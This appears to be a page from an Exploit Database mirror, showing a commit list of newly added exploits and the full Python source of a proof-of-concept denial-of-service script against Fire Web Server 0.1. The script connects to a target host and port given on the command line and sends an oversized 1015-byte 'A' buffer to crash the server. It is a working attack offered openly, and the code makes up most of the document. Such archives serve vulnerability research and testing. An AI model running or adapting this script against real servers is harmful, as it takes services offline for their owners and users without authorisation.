exploit-db-mirror/exploits/windows/dos/48637.py
Offensive Security 1bc852d2af DB: 2020-07-07
7 changes to exploits/shellcodes

Frigate 2.02 - Denial Of Service (PoC)
Fire Web Server 0.1 - Remote Denial of Service (PoC)
Grafana 7.0.1 - Denial of Service (PoC)
File Management System 1.1 - Persistent Cross-Site Scripting
RiteCMS 2.2.1 - Authenticated Remote Code Execution
RSA IG&L Aveksa 7.1.1 - Remote Code Execution
Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution
2020-07-07 05:01:57 +00:00

20 lines
No EOL
664 B
Python
Executable file

# Exploit Title: Fire Web Server 0.1 - Remote Denial of Service (PoC)
# Date: 2020-06-26
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/firewebserver/
# Software Link: https://sourceforge.net/projects/firewebserver/files/
# Version: Pre-Alpha
# Tested on: Windows 7 , Windows Vista
#!/usr/bin/python
import socket,os,sys
if len(sys.argv) < 3:
print "Usage: python fwspa_dos.py targetIP targetPort"
else:
print "[*] Sending evil http request to target"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((sys.argv[1], int(sys.argv[2])))
expl.send("A"*1015)
expl.close()